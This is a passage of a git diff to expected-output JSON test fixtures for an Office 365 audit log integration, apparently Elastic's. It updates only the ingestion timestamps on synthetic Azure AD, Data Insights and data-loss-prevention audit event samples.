Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3c439e46-d454-4767-9320-1e75540821b7\",\"InterSystemsId\":\"fc5c6c90-a6ba-486c-b685-8d67c529d3aa\",\"IntraSystemId\":\"6e184f6f-887b-4410-b24d-723031366000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json index a4d621ba4f6..326972161ad 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json @@ -25,7 +25,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698290600Z", + "ingested": "2021-12-14T14:49:25.957824969Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -72,7 +72,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698300600Z", + "ingested": "2021-12-14T14:49:25.957827435Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", 
@@ -119,7 +119,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698306900Z", + "ingested": "2021-12-14T14:49:25.957828019Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -166,7 +166,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698312900Z", + "ingested": "2021-12-14T14:49:25.957828434Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -213,7 +213,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698318900Z", + "ingested": "2021-12-14T14:49:25.957828848Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", 
@@ -260,7 +260,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698324800Z", + "ingested": "2021-12-14T14:49:25.957829277Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -307,7 +307,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698330800Z", + "ingested": "2021-12-14T14:49:25.957829687Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -354,7 +354,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698336700Z", + "ingested": "2021-12-14T14:49:25.957830158Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", 
@@ -401,7 +401,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698342600Z", + "ingested": "2021-12-14T14:49:25.957830574Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json index 410b3afce36..614e427c631 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json 
@@ -151,7 +151,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.292337500Z", + "ingested": "2021-12-14T14:49:26.527166391Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected 
test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
@@ -323,7 +323,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.292347200Z", + "ingested": "2021-12-14T14:49:26.527201058Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleUndo\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected 
test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
@@ -498,7 +498,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.292353800Z", + "ingested": "2021-12-14T14:49:26.527202811Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExceptionInfo\":\"{ \\\"Justification\\\": \\\"I really need to share those files\\\" }\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected 
test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
@@ -673,7 +673,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.292360200Z", + "ingested": "2021-12-14T14:49:26.527203339Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExceptionInfo\":{\"FalsePositive\":true},\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected 
test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
@@ -800,7 +800,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:42:29.292366400Z", + "ingested": "2021-12-14T14:49:26.527203826Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13310,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"a42123a9-1c07-4dde-9be6-ac71cb9fd16b\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"8398c03a-a00d-42bb-8f80-ead0ad04e1df\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected test\",\"Severity\":\"Low\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
@@ -918,7 +918,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:42:29.292372700Z", + "ingested": "2021-12-14T14:49:26.527204283Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"Id\":\"a42123a9-1c07-4dde-9be6-ac71cb9fd16b\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"8398c03a-a00d-42bb-8f80-ead0ad04e1df\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected test\",\"Severity\":\"Low\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Company-Internal-Financial.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://example.net/testsiem2.onmicrosoft.com/sharepoint\",\"From\":\"alice@testsiem2.onmicrosoft.com\",\"LastModifiedTime\":\"2020-02-24T12:13:14Z\",\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\",\"itemCreationTime\":\"2020-02-20T11:23:45\"},\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json index 6c0abb8d322..e3b3fbe2c8e 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json 
@@ -84,7 +84,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:42:29.971752Z", + "ingested": "2021-12-14T14:49:27.201924295Z", "original": "{\"CreationTime\":\"2020-02-25T16:20:15\",\"Id\":\"a21f13b9-22b6-405b-bf9e-a07ad8d456da\",\"IncidentId\":\"3066c3c5-eb56-dd03-b000-08d7ba115afd\",\"ObjectId\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[],\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"c5981414-9f1f-4275-a2df-2fbfb1d03795\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected U.S. Financial\",\"Severity\":\"Low\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T15:22:49\",\"ItemLastModifiedTime\":\"2020-02-25T16:19:43\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", 
